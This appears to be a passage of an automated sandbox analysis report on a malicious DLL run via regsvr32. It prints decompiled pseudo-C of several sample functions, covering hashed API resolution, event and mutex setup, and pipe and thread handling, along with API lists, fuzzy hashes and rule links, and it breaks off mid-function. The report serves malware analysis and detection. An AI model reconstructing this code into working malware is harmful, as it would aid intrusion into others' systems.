				 *((long long*)(__rcx + 0xa0)) = 0x180002f24;
				_t130 = _t129 | 0xffffffff;
				 *((long long*)(__rcx + 0xa8)) = E00000001180007A7C;
				r13d = _t130 + 2;
				r9d = 0;
				r8d = 0;
				 *((long long*)(__rcx + 0x98)) = E00000001180008368;
				 *((long long*)(__rcx + 0x90)) = _t127;
				 *_t127 = _t127;
				 *(__rcx + 0x10) = _t130;
				CreateEventA(??, ??, ??, ??);
				 *((long long*)(__rcx + 0x20)) = E00000001180008368;
				if (E00000001180008368 == 0) goto 0x80003bd6;
				r9d = 0;
				r8d = 0;
				CreateEventA(??, ??, ??, ??);
				 *((long long*)(__rcx + 0x30)) = E00000001180008368;
				if (E00000001180008368 == 0) goto 0x80003bd6;
				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t119;
				r8d = 0;
				CreateMutexA(??, ??, ??);
				 *((long long*)(__rcx + 0x28)) = E00000001180008368;
				 *(__rcx + 0x38) = E00000001180008368;
				if (E00000001180008368 == 0) goto 0x80003bd6;
				_t39 = E00000001180001C00(__rcx, __r9, _t110, __r9,  *0x8000d4a0, _t119);
				 *_t98 = E00000001180008368;
				E0000000118000459C(_t39, 0x176fdd38,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
				_t72 = _t130 + 7;
				if (E00000001180008368 == 0) goto 0x80003b4c;
				r8d = _t72;
				_t41 = E00000001180008368(__r9 - 4, r13d, _t75,  *((intOrPtr*)( *0x8000d4a0 + 0x30)), _t119);
				goto 0x80003b4f;
				_t95 = _t130;
				 *(_t98 + 0x10) = _t95;
				if (_t95 != _t130) goto 0x80003bb0;
				E0000000118000459C(_t41, 0xb27f4910,  *((intOrPtr*)(_t117 + 0x30)));
				if (_t95 == 0) goto 0x80003b79;
				 *_t95();
				goto 0x80003b7b;
				if (0 != 0) goto 0x80003bd6;
				E0000000118000459C(0, 0x176fdd38,  *((intOrPtr*)(_t117 + 0x30)));
				if (_t95 == 0) goto 0x80003ba4;
				r8d = _t72;
				 *_t95();
				goto 0x80003ba7;
				_t96 = _t130;
				 *(_t98 + 0x10) = _t96;
				if (_t96 == _t130) goto 0x80003bd6;
				_t28 = _t98 + 0x18; // 0x18
				E00000001180006C8C(_t96, _t98, E0000000118000431C, _t98, _t117, _t119, _t28);
				 *(_t98 + 8) = _t96;
				if (_t96 == 0) goto 0x80003bd6;
				SwitchToThread();
				goto 0x80003c03;
				_t49 = GetLastError();
				if (_t49 == 0) goto 0x80003c03;
				_t50 = E00000001180007950(_t98, _t98, _t98, _t114, _t117, _t119);
				if (r13d == 0) goto 0x80003c03;
				E0000000118000459C(_t50, 0x9cb92d3f,  *((intOrPtr*)(_t117 + 0x30)));
				if (_t96 == 0) goto 0x80003c03;
				 *_t96();
				return _t49;
			}

APIs

memcpy.NTDLL ref: 0000000180003A65
InitializeCriticalSection.KERNEL32 ref: 0000000180003A6E
CreateEventA.KERNEL32 ref: 0000000180003AC7
CreateEventA.KERNEL32 ref: 0000000180003AE5
CreateMutexA.KERNEL32 ref: 0000000180003B03
SwitchToThread.KERNEL32 ref: 0000000180003BCC

Part of subcall function 0000000180007950: SetEvent.KERNEL32 ref: 000000018000798D
Part of subcall function 0000000180007950: WaitForSingleObject.KERNEL32 ref: 00000001800079AA
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 00000001800079B4
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 00000001800079C3
Part of subcall function 0000000180007950: EnterCriticalSection.KERNEL32 ref: 00000001800079CD
Part of subcall function 0000000180007950: LeaveCriticalSection.KERNEL32 ref: 00000001800079F4
Part of subcall function 0000000180007950: Sleep.KERNEL32 ref: 0000000180007A17
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 0000000180007A2F
Part of subcall function 0000000180007950: CloseHandle.KERNEL32 ref: 0000000180007A3E
Part of subcall function 0000000180007950: HeapFree.KERNEL32 ref: 0000000180007A51
Part of subcall function 0000000180007950: DeleteCriticalSection.KERNEL32 ref: 0000000180007A5B

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: CloseCriticalHandleSection$CreateEvent$DeleteEnterErrorFreeHeapInitializeLastLeaveMutexObjectSingleSleepSwitchThreadWaitmemcpy
String ID:
API String ID: 810493412-0
Opcode ID: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
Instruction ID: da56e0963138b123f8a3a91eab94b9da458cf35c37d31fe2a2e97a6efbfc397b
Opcode Fuzzy Hash: b816b6a790a3b77e0cb1c9170e0e56660fdfce69cd924edd7d4bea04d9f1c9d6
Instruction Fuzzy Hash: 5F51C332301B4882EB97DF22A4117DA73A8FB8CBD8F448524AE5D47795EF38CA09C350

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002B60 Relevance: 7.7, APIs: 5, Instructions: 244
memorytimeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E00000001180002B60(void* __ebx, void* __edi, void* __esi, void* __ebp, void* __rcx, void* __r9, void* __r10, signed long long __r11) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t79;
				int _t80;
				signed int _t94;
				void* _t111;
				void* _t146;
				long long _t178;
				long long* _t179;
				long long* _t182;
				void* _t184;
				long long _t186;
				void* _t194;
				intOrPtr _t215;
				void* _t228;
				void* _t229;
				long long _t232;
				void* _t233;
				void* _t259;
				signed long long _t260;

				_t260 = __r11;
				_t259 = __r10;
				_t178 = _t232;
				_t233 = _t232 - 0x60;
				r12d =  *0x8000d498;
				 *(_t178 + 0x20) =  *(_t178 + 0x20) & 0x00000000;
				_t229 = __rcx;
				if (E00000001180002464(_t178, _t184,  *0x8000d4a0 + 0x28, __rcx) != 0) goto 0x80002bd9;
				_t79 = E00000001180002464(_t178, _t184,  *0x8000d4a0 + 0x20, _t229);
				if (_t79 == 0) goto 0x80002bd9;
				_t80 = HeapFree(??, ??, ??);
				if (_t79 != 0) goto 0x80002f0d;
				_t194 = _t233 + 0x48;
				if (E00000001180008C60(_t80, _t111, _t184, _t194, _t228, _t229) != 0) goto 0x80002ed2;
				r9d =  *( *((intOrPtr*)(_t229 + 0x40)) + 2) & 0x0000ffff;
				if (_t194 - __r9 + 8 <= 0) goto 0x80002c2b;
				if ((r12d ^ 0xe49a1e6d) == 0) goto 0x80002c2d;
				E00000001180004ED8(__r9 +  *((intOrPtr*)(_t229 + 0x40)) + 8, __r9 + 8);
				_t186 = _t178;
				goto 0x80002c2d;
				if (_t186 == 0) goto 0x80002ec8;
				_t21 = _t229 + 0xb0; // 0xb0
				 *((long long*)(_t233 + 0x28)) = _t186;
				 *(_t233 + 0x20) =  *(_t233 + 0x20) & 0x00000000;
				if (E000000011800022AC(_t186, _t186, _t21,  *((intOrPtr*)(_t233 + 0x48)), _t229,  *0x8000d490,  *((intOrPtr*)(_t229 + 0x30)),  *((intOrPtr*)(_t229 + 0x38))) != 0) goto 0x80002ec8;
				_t179 =  *((intOrPtr*)(_t229 + 0x28));
				 *((long long*)(_t233 + 0x40)) = _t179;
				if (E00000001180002370(_t186,  *((intOrPtr*)(_t233 + 0x48)), _t260) != 0) goto 0x80002caf;
				if (E000000011800038F8(_t86, 0,  *((intOrPtr*)(_t233 + 0x38)), _t233 + 0xa8) == 0) goto 0x80002caf;
				goto 0x80002cb8;
				 *(_t233 + 0xa8) = 0;
				E0000000118000459C(_t87, 0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				r15d = 0x7f;
				if (_t179 == 0) goto 0x80002cec;
				r9d = 0;
				r8d = 0;
				 *_t179();
				goto 0x80002cef;
				if (r15d != 0x102) goto 0x80002ec8;
				 *(_t229 + 0x64) = 0x3e8;
				if (E00000001180002370(_t186, _t233 + 0x40, _t260) != 0) goto 0x80002d41;
				 *(_t233 + 0x20) =  *(_t233 + 0x20) & 0x00000000;
				r9d = 0;
				E00000001180002668(0, 0x17fffff82, _t179, _t186, _t229, 0x180001844, _t229,  *0x8000d490,  *((intOrPtr*)(_t233 + 0x38)), _t233 + 0xb0);
				if (E00000001180002370(_t186, 0x180001844, _t260) != 0) goto 0x80002d8f;
				if (E000000011800038F8(_t92, 0,  *((intOrPtr*)(_t233 + 0x38)), _t233 + 0xa8) == 0) goto 0x80002d8f;
				_t94 =  *(_t233 + 0xa8);
				if (_t94 == 0) goto 0x80002d8f;
				 *(_t229 + 0x64) = _t94 * 0x3e8;
				if (E00000001180002370(_t186, 0x180001844, _t260) != 0) goto 0x80002dd2;
				if (E000000011800038F8(_t96, 0,  *((intOrPtr*)(_t233 + 0x38)), _t233 + 0xa8) == 0) goto 0x80002dd2;
				goto 0x80002ddb;
				 *(_t233 + 0xa8) = 0;
				r12d = r12d ^ 0xe5c7ba87;
				if (E00000001180002370(_t186, 0x180001844, _t260) != 0) goto 0x80002e40;
				if (E000000011800038F8(_t98, 0,  *((intOrPtr*)(_t233 + 0x38)), _t233 + 0xb8) == 0) goto 0x80002e40;
				GetSystemTimeAsFileTime(??);
				r11d =  *((intOrPtr*)(_t233 + 0xb8));
				 *((intOrPtr*)(_t229 + 0x60)) = r11d;
				_t182 = _t260 * 0x23c34600 +  *((intOrPtr*)(_t233 + 0x50));
				 *((long long*)(_t229 + 0x58)) = _t182;
				if (E00000001180007DBC(0, 0x17fffff82, 0, 0, E000000011800038F8(_t98, 0,  *((intOrPtr*)(_t233 + 0x38)), _t233 + 0xb8), _t229, _t233 + 0x58, _t233 + 0x30) != 0) goto 0x80002e68;
				r8d =  *((intOrPtr*)(_t233 + 0x30));
				E0000000118000459C(E0000000118000137C(0x17fffff82, 0, r15d, __esi, 0, _t186, _t229,  *((intOrPtr*)(_t233 + 0x58)), _t259), 0xab05e147,  *((intOrPtr*)( *0x8000d4a0 + 0x18)));
				if (_t182 == 0) goto 0x80002e97;
				r8d = 0;
				r9d = 0;
				r9d = r9d * 0x3e8;
				 *_t182();
				goto 0x80002e9a;
				_t146 = r15d;
				if (_t146 != 0) goto 0x80002e40;
				if ( *((intOrPtr*)(_t229 + 0x50)) == 0) goto 0x80002ec8;
				E00000001180007950( *((intOrPtr*)( *0x8000d4a0 + 8)),  *((intOrPtr*)(_t229 + 0x50)), _t233 + 0x40, _t228,  *((intOrPtr*)(_t229 + 0x50)),  *0x8000d490);
				HeapFree(??, ??, ??);
				E00000001180002620();
				_t215 =  *0x8000d4a0;
				if ( *((intOrPtr*)(_t215 + 0x20)) == 0) goto 0x80002ef8;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t215 + 0x28)) == 0) goto 0x80002f0d;
				HeapFree(??, ??, ??);
				asm("lock inc ecx");
				return _t146;
			}

0x180002b60
0x180002b60
0x180002b60
0x180002b6d
0x180002b7f
0x180002b86
0x180002b8a
0x180002ba9
0x180002bb7
0x180002bc0
0x180002bd3
0x180002bdb
0x180002be1
0x180002bef
0x180002bfc
0x180002c11
0x180002c1a
0x180002c21
0x180002c26
0x180002c29
0x180002c30
0x180002c43
0x180002c4a
0x180002c4f
0x180002c5d
0x180002c63
0x180002c80
0x180002c8c
0x180002ca4
0x180002cad
0x180002cb1
0x180002cc1
0x180002cc6
0x180002ccf
0x180002ce0
0x180002ce3
0x180002ce6
0x180002cea
0x180002cf5
0x180002d14
0x180002d22
0x180002d29
0x180002d36
0x180002d3c
0x180002d61
0x180002d79
0x180002d7b
0x180002d84
0x180002d8c
0x180002daf
0x180002dc7
0x180002dd0
0x180002dd4
0x180002ddb
0x180002dfc
0x180002e14
0x180002e1b
0x180002e21
0x180002e2c
0x180002e37
0x180002e3c
0x180002e54
0x180002e56
0x180002e71
0x180002e79
0x180002e7b
0x180002e7e
0x180002e8a
0x180002e91
0x180002e95
0x180002e97
0x180002e9c
0x180002ea5
0x180002eb5
0x180002ec2
0x180002ecd
0x180002ed2
0x180002ee3
0x180002eeb
0x180002eff
0x180002f07
0x180002f0d
0x180002f23

APIs

Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476

Part of subcall function 0000000180002464: FreeLibrary.KERNEL32(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 00000001800024A7

HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002BD3
GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180002E1B
HeapFree.KERNEL32 ref: 0000000180002EC2
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002EEB
HeapFree.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0000000180002F07

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Free$Heap$LibraryTime$FileLoadSystem
String ID:
API String ID: 1415693639-0
Opcode ID: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
Instruction ID: d455ad72a2173ea311d53c287058b5208197830efbff1c216518b590d8193917
Opcode Fuzzy Hash: 5e368ffbea44e81b77d41e8b41b472461b0af584182af94ce1e612372c450cfb
Instruction Fuzzy Hash: A5A15172204B8996EBA2DB66E4407DA73A5F78D7D4F448022FA4D47A95DF38C64AC700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800027D4 Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 187
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 26%

			E000000011800027D4(void* __ebx, void* __ecx, void* __edx, void* __ebp, void* __esp, long long __rbx, intOrPtr* __rcx, void* __rdx) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t53;
				int _t56;
				void* _t60;
				void* _t62;
				void* _t66;
				int _t69;
				void* _t105;
				long long* _t124;
				long long* _t125;
				long long* _t126;
				long long* _t127;
				long long* _t128;
				void* _t156;
				void* _t157;
				intOrPtr* _t158;
				void* _t160;
				void* _t163;
				long long* _t166;
				void* _t168;
				void* _t169;
				long _t181;
				void* _t183;
				void* _t186;
				void* _t189;

				_t128 = __rbx;
				 *((long long*)(_t168 + 0x10)) = __rbx;
				 *(_t168 + 0x18) = r8d;
				_t169 = _t168 - 0x50;
				_t124 =  *0x8000d4a0;
				_t161 =  *__rcx;
				_t158 = __rcx;
				r15d = r9d;
				_t53 = E00000001180007B04(__rbx, __rdx, __rcx,  *__rcx, _t163, __rdx, _t189, _t186);
				if (_t124 == _t128) goto 0x80002a78;
				_t105 =  *((char*)(_t158 + 0x75)) - 6;
				_t5 = _t128 + 4; // 0x4
				r12d = _t5;
				if (_t105 > 0) goto 0x8000283e;
				if (_t105 != 0) goto 0x80002835;
				if ( *((char*)(_t158 + 0x74)) - 2 > 0) goto 0x8000283e;
				 *((intOrPtr*)(_t169 + 0x90)) = 0;
				goto 0x80002846;
				 *((intOrPtr*)(_t169 + 0x90)) = r12d;
				E0000000118000459C(_t53, 0x3fe3c8ba,  *((intOrPtr*)(_t161 + 0x50)));
				if (_t124 == _t128) goto 0x80002871;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t169 + 0x20)) = 0;
				 *_t124();
				goto 0x80002874;
				_t125 = _t128;
				 *((long long*)(_t158 + 0x28)) = _t125;
				_t56 = HeapFree(_t183, _t181, _t157);
				if ( *((intOrPtr*)(_t158 + 0x28)) == _t128) goto 0x80002a78;
				if ( *((intOrPtr*)(_t169 + 0xa0)) == 0) goto 0x800028ce;
				E0000000118000459C(_t56, 0xe7f09937,  *((intOrPtr*)(_t161 + 0x50)));
				if (_t125 == _t128) goto 0x800028c4;
				_t17 = _t169 + 0xa0; // 0x12
				r9d = r12d;
				 *_t125();
				goto 0x800028c6;
				if (0 == 0) goto 0x80002a78;
				_t60 = E00000001180007B04(_t128,  *((intOrPtr*)(_t158 + 8)), _t158, _t161, _t124, _t17, _t160, _t163);
				if (_t125 == _t128) goto 0x80002a78;
				 *((intOrPtr*)(_t169 + 0x90)) = 0x100;
				if ( *((intOrPtr*)(_t169 + 0xb0)) == 0) goto 0x80002938;
				 *((intOrPtr*)(_t169 + 0x40)) = 0xaa0;
				E0000000118000459C(_t60, 0xe7f09937,  *((intOrPtr*)(_t161 + 0x50)));
				if (_t125 == _t128) goto 0x80002927;
				r9d = r12d;
				_t62 =  *_t125();
				asm("bts dword [esp+0x90], 0x17");
				r12d = 0x1bb;
				goto 0x8000293e;
				r12d = 0x50;
				E0000000118000459C(_t62, 0x7dda0345,  *((intOrPtr*)(_t161 + 0x50)));
				if (_t125 == _t128) goto 0x80002963;
				r9d = 0;
				r8d = r12w & 0xffffffff;
				 *_t125();
				goto 0x80002966;
				_t126 = _t128;
				 *((long long*)(_t158 + 0x30)) = _t126;
				HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t158 + 0x30)) == _t128) goto 0x80002a78;
				_t66 = E00000001180007B04(_t128,  *((intOrPtr*)(_t158 + 0x10)), _t158, _t161, _t125, _t125);
				_t166 = _t126;
				if (_t126 == _t128) goto 0x80002a78;
				E0000000118000459C(_t66, 0xaa9d9fc1,  *((intOrPtr*)(_t161 + 0x50)));
				if (_t126 == _t128) goto 0x800029ed;
				_t156 =  !=  ?  *0x8000d490 + 0x180011260 :  *0x8000d490 + 0x180011278;
				r9d = 0;
				 *((intOrPtr*)(_t169 + 0x30)) =  *((intOrPtr*)(_t169 + 0x90));
				 *((long long*)(_t169 + 0x28)) = _t128;
				 *((long long*)(_t169 + 0x20)) = _t128;
				 *_t126();
				goto 0x800029f0;
				_t127 = _t128;
				 *((long long*)(_t158 + 0x38)) = _t127;
				_t69 = HeapFree(??, ??, ??);
				if ( *((intOrPtr*)(_t158 + 0x38)) == _t128) goto 0x80002a78;
				 *((intOrPtr*)(_t169 + 0x44)) = 4;
				E0000000118000459C(_t69, 0x677ec78c,  *((intOrPtr*)(_t161 + 0x50)));
				_t45 = _t166 + 0x1b; // 0x1f
				r12d = _t45;
				if (_t127 == _t128) goto 0x80002a40;
				 *_t127();
				goto 0x80002a42;
				if (0 == 0) goto 0x80002a80;
				asm("bts dword [esp+0x90], 0x8");
				E0000000118000459C(0, 0xe7f09937,  *((intOrPtr*)(_t161 + 0x50)));
				if (_t127 == _t128) goto 0x80002a80;
				r9d = 4;
				 *_t127();
				goto 0x80002a80;
				return GetLastError();
			}

APIs

Part of subcall function 0000000180007B04: lstrlenA.KERNEL32 ref: 0000000180007B2B
Part of subcall function 0000000180007B04: HeapAlloc.KERNEL32 ref: 0000000180007B46
Part of subcall function 0000000180007B04: memset.NTDLL ref: 0000000180007B71

HeapFree.KERNEL32 ref: 0000000180002880
HeapFree.KERNEL32 ref: 0000000180002972
HeapFree.KERNEL32 ref: 00000001800029FC
GetLastError.KERNEL32(00000012,00000000,?,00000001800054C9,?,000000018000134F), ref: 0000000180002A78

Strings

P, xrefs: 0000000180002938

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$Free$AllocErrorLastlstrlenmemset
String ID: P
API String ID: 1242601240-3110715001
Opcode ID: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
Instruction ID: b9b39858d45b2fed8cd52d627653eb03beea5c07a2efbf285fd96505e9c46d20
Opcode Fuzzy Hash: 6e262a4d51cbb5cdb0bca898ebc316c77d6222acc70f3ffea50beea523427e07
Instruction Fuzzy Hash: E2718B7230468897EBA2DF62A8443DA73A0F78DBC4F488425AF4E47B46CF38D658C710

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008368 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 154
filepipethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateEventA.KERNEL32 ref: 000000018000839A
ResumeThread.KERNEL32 ref: 00000001800083EE
GetExitCodeProcess.KERNEL32 ref: 00000001800083FD
PeekNamedPipe.KERNEL32 ref: 0000000180008437
ReadFile.KERNEL32 ref: 0000000180008465
WriteFile.KERNEL32 ref: 00000001800084DC
WaitForMultipleObjects.KERNEL32 ref: 0000000180008500
WriteFile.KERNEL32 ref: 0000000180008567
ResetEvent.KERNEL32 ref: 0000000180008576
GetLastError.KERNEL32 ref: 000000018000858B
GetLastError.KERNEL32 ref: 0000000180008598
CloseHandle.KERNEL32 ref: 00000001800085AA

Part of subcall function 000000018000459C: SetLastError.KERNEL32 ref: 00000001800045D8

Strings

.RK, xrefs: 000000018000851D

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorFileLast$EventWrite$CloseCodeCreateExitHandleMultipleNamedObjectsPeekPipeProcessReadResetResumeThreadWait
String ID: .RK
API String ID: 1606758550-3354657194
Opcode ID: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
Instruction ID: c67b93fc325dec5a333161014b43f1cf91cc3d00d80d1a92eadb22293fcdf481
Opcode Fuzzy Hash: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
Instruction Fuzzy Hash: 6C614032314A49D2EB92CB25E9947DA73E0FB8C7C5F408121FB8987A94DF38D658DB10

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800031D4 Relevance: 18.1, APIs: 12, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E000000011800031D4(void* __ecx, long long __rbx, signed long long __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r8, char _a32) {
				void* _v40;
				char _v56;
				char _v64;
				char _v72;
				long long _v88;
				void* _t43;
				void* _t45;
				intOrPtr _t47;
				void* _t48;
				void* _t71;
				void* _t72;
				long long _t83;
				long long _t85;
				long long _t86;
				signed long long _t97;
				intOrPtr _t109;
				CHAR* _t111;
				signed long long _t112;
				long long _t113;
				intOrPtr _t117;
				void* _t122;
				void* _t135;
				long _t137;
				long _t141;
				void* _t144;
				CHAR* _t146;
				long long* _t147;

				_t87 = __rbx;
				_t135 = _t122;
				 *((long long*)(_t135 + 8)) = __rbx;
				 *((long long*)(_t135 + 0x10)) = __rbp;
				 *((long long*)(_t135 + 0x18)) = __rsi;
				_t83 =  *0x8000d4a0;
				_t4 = _t135 + 0x20; // -102
				_t147 = __r8;
				_t112 = __rcx;
				E00000001180006A84(_t72, __rbx, _t4, __rsi);
				if (_t83 == 0) goto 0x80003391;
				lstrlenA(_t146);
				r14d = _a32;
				_t8 = _t144 + 1; // 0x1
				r8d = _t83 + _t8;
				HeapAlloc(_t144, _t141, _t137);
				_v64 = _t83;
				if (_t83 == 0) goto 0x80003383;
				memcpy(??, ??, ??);
				lstrcpyA(_t111);
				r8d = lstrlenA(??);
				_t12 =  &_a32; // -6
				_v88 = _t12;
				_t43 = E00000001180001208(_t71, _t87, _t112, _t83, _t83,  *((intOrPtr*)(_t83 + 8)),  &_v56);
				HeapFree(??, ??, ??);
				if (_t43 != 0) goto 0x80003383;
				r8d = _a32;
				_t109 = _v56;
				_t16 =  &_v72; // -110
				_t85 = _t16;
				_t97 = _t112;
				_v88 = _t85;
				_t45 = E0000000118000467C(_t87, _t109, _t83,  *((intOrPtr*)(_t83 + 8)),  &_v64);
				_t117 = _v64;
				if (_v72 == 0) goto 0x800032ee;
				if ( *((char*)(_t109 + _t117)) != 0x3d) goto 0x800032ee;
				if (_t97 - 1 != 0) goto 0x800032df;
				 *((char*)(_t85 + _t117)) = 0;
				if (_t45 != 0) goto 0x80003365;
				_t86 =  *0x8000d4a0;
				_t47 = _t97 + 1 + _t97 * 2;
				r8d = _t47;
				_a32 = _t47;
				_t48 = HeapAlloc(??, ??, ??);
				_t113 = _t86;
				if (_t86 == 0) goto 0x80003360;
				r9d = 0;
				__imp__UrlEscapeA();
				if (_t48 != 0) goto 0x80003350;
				 *_t147 = _t113;
				 *(_t117 + _t113) = _t48;
				goto 0x80003365;
				HeapFree(??, ??, ??);
				goto 0x80003365;
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				HeapFree(??, ??, ??);
				return 8;
			}

0x1800031d4
0x1800031d4
0x1800031d7
0x1800031db
0x1800031df
0x1800031f0
0x1800031fa
0x180003202
0x180003205
0x18000320d
0x180003218
0x180003221
0x180003227
0x180003231
0x180003231
0x180003239
0x180003242
0x18000324a
0x180003259
0x180003265
0x18000327c
0x18000327f
0x18000328a
0x18000328f
0x18000329e
0x1800032a6
0x1800032ac
0x1800032b4
0x1800032b9
0x1800032b9
0x1800032c3
0x1800032c6
0x1800032cb
0x1800032d4
0x1800032dd
0x1800032e6
0x1800032ec
0x1800032f0
0x1800032f6
0x1800032f8
0x180003305
0x180003309
0x18000330f
0x180003316
0x18000331c
0x180003322
0x18000332c
0x180003335
0x18000333f
0x180003348
0x18000334b
0x18000334e
0x180003358
0x18000335e
0x18000336d
0x18000337d
0x18000338b
0x1800033b0

APIs

Part of subcall function 0000000180006A84: HeapAlloc.KERNEL32 ref: 0000000180006B46
Part of subcall function 0000000180006A84: HeapFree.KERNEL32 ref: 0000000180006B78
Part of subcall function 0000000180006A84: HeapFree.KERNEL32 ref: 0000000180006B86

lstrlenA.KERNEL32(00000000,0000000180006466), ref: 0000000180003221
HeapAlloc.KERNEL32 ref: 0000000180003239
memcpy.NTDLL ref: 0000000180003259
lstrcpyA.KERNEL32 ref: 0000000180003265
lstrlenA.KERNEL32 ref: 000000018000326E

Part of subcall function 0000000180001208: EnterCriticalSection.KERNEL32(?,000000018000134F), ref: 0000000180001256
Part of subcall function 0000000180001208: LeaveCriticalSection.KERNEL32 ref: 0000000180001265
Part of subcall function 0000000180001208: HeapAlloc.KERNEL32 ref: 000000018000129C

HeapFree.KERNEL32 ref: 000000018000329E

Part of subcall function 000000018000467C: HeapAlloc.KERNEL32 ref: 00000001800046D2

HeapAlloc.KERNEL32 ref: 0000000180003316
UrlEscapeA.SHLWAPI ref: 0000000180003335
HeapFree.KERNEL32 ref: 0000000180003358
HeapFree.KERNEL32 ref: 000000018000336D
HeapFree.KERNEL32 ref: 000000018000337D
HeapFree.KERNEL32 ref: 000000018000338B

Memory Dump Source

Source File: 00000003.00000002.246746389.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.246732994.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246819125.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.246853503.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Heap$Free$Alloc$CriticalSectionlstrlen$EnterEscapeLeavelstrcpymemcpy
String ID:
API String ID: 1109037607-0
Opcode ID: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
Instruction ID: acf6d717728defc35103db72fb922d6f00203a7e454cd640fbdac6a35d594990
Opcode Fuzzy Hash: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
Instruction Fuzzy Hash: F0519A35304B8986EB96CB67A8447DA73A5FB8DFC4F44C025EE4A83754EE39C609C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007950 Relevance: 18.1, APIs: 12, Instructions: 78
sleepmemorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00000001180007950(long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				int _t29;
				int _t34;
				void* _t35;
				void* _t54;
				intOrPtr* _t57;
				intOrPtr* _t74;
				intOrPtr* _t77;
				void* _t82;
				void* _t86;

				if (__rcx == 0) goto 0x80007a7b;
				_t54 = _t82;
				 *((long long*)(_t54 + 8)) = __rbx;
				 *((long long*)(_t54 + 0x10)) = __rbp;
				 *((long long*)(_t54 + 0x18)) = __rsi;
